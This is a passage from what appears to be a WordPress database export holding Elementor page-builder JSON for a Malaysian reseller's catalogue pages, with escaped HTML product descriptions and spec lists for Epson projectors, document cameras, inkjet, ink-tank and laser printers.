EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7737,3449,'_wp_page_template','template-fullwidth.php'),(7741,3449,'_elementor_version','2.5.14'),(7744,3450,'_wp_page_template','template-fullwidth.php'),(7745,3450,'_elementor_edit_mode','builder'),(7746,3450,'_elementor_template_type','post'),(7747,3450,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EcoTank L3150<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2421\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L120 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson M1100 Printer<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2423\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson AcuLaser C9300N<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" 